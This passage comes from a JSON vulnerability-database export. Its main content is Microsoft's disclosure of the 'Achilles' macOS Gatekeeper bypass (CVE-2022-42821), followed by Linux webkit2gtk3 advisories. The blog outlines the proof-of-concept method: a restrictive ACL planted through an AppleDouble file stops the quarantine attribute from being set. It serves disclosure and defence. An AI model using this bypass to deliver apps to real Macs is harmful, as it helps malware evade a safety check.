"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MMPC:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "mssecure": [{"lastseen": "2022-12-20T03:05:39", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple&#x27;s [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\nFigure 1. A common _com.apple.quarantine_ extended attribute value Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\nFigure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\nFigure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\nFigure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\nFigure 6. Viewing the &quot;hello.sh&quot; file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\nFigure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\nFigure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\nFigure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mssecure", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MSSECURE:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "rocky": [{"lastseen": "2023-08-12T02:17:58", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 9.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Rocky Linux 9.1 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-15T06:14:22", "type": "rocky", "title": "webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-15T06:14:22", "id": "RLSA-2022:8054", "href": "https://errata.rockylinux.org/RLSA-2022:8054", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-12T02:18:11", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nGLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Rocky Linux 8.7 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-08T06:26:46", "type": "rocky", "title": "webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-08T06:26:46", "id": "RLSA-2022:7704", "href": "https://errata.rockylinux.org/RLSA-2022:7704", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-06-14T14:52:31", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 9.1 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-15T06:14:22", "type": "redhat", "title": "(RHSA-2022:8054) Moderate: webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-15T08:05:02", "id": "RHSA-2022:8054", "href": "https://access.redhat.com/errata/RHSA-2022:8054", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T14:52:31", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nGLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 8.7 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-08T06:26:46", "type": "redhat", "title": "(RHSA-2022:7704) Moderate: webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-08T07:49:12", "id": "RHSA-2022:7704", "href": "https://access.redhat.com/errata/RHSA-2022:7704", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:57", "description": "Service Binding manages the data plane for applications and backing services.\n\nSecurity Fix(es):\n\n* golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-27T00:54:13", "type": "redhat", "title": "(RHSA-2023:0918) Moderate: Service Binding Operator security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46848", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-35737", "CVE-2022-40303", 